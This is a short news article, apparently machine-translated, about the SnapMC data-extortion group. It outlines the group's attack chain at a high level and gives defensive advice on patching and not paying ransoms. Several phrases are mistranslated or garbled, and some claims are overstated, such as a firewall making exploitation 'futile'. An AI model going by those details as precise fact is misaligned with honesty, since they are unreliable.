A new malicious group identified as SnapMC, appeared on the scene of cybercrime, performing the standard data theft with extortion that supports functions ransomware, but without encrypting the files.
File encryption is considered a key component of ransomware attacks, as it is the element that pushes the victim the most.
Data theft for dual blackmail purposes later came as an additional form of victim pressure, but was always behind the chaos that could be caused by encrypting a network.
Soon, ransomware attackers realized the power of this approach, as many companies were able to recover damaged files from backups, but could not recover the stolen files and their effects.
Researchers at the NCC Group are tracking down a new opponent called SnapMC, named after the team that enters networks, steals files and delivers blackmail messages in less than 30 minutes.
The SnapMC gang uses the vulnerability scanner Acunetix, to detect a number of glitches in a target VPN and web server applications and then successfully exploits them to breach the corporate network.
The most exploited vulnerabilities observed in the initial malware access attempts include PrintNightmare LPE, Telerik UI remote code execution for ASPX.NET, and various SQL injection attacks.
See also: Ransomware operators arrested in Ukraine
Actors use SQL database export scripts to steal data, while CSV files are compressed with the 7zip archiving utility before filtering. Once everything is settled, the MinIO client is used to send the data back to the attacker.
Given that SnapMC exploits known vulnerabilities that have already been fixed, updating your software tools would be a good way to protect yourself from this growing threat.
As the NCC team points out in exhibition even if an organization uses a vulnerable version of Telerik, placing it behind a well-designed Web application firewall would make any exploitation effort futile.
In data extortion blackmail attacks, meeting the ransomware requirements of the threat carrier does not guarantee anything. Instead, it could give hackers an incentive to attempt further blackmail in the future.
It is also possible that even if a victim pays the ransom, his or her data may end up being sold in criminal markets or forums as an additional way to generate revenue for the attackers.
The trading company Ransomware Coveware, strongly advises its customers to never pay ransom to prevent the leak of stolen files to the public.
In the course of negotiating cases in the past, the victims they paid a ransom and their data was leaked or no proof of deletion was ever given.
Because of this, victims should automatically assume that their data has been shared with other threat agents and that it will be used or leaked in the future, regardless of whether they have paid a ransom.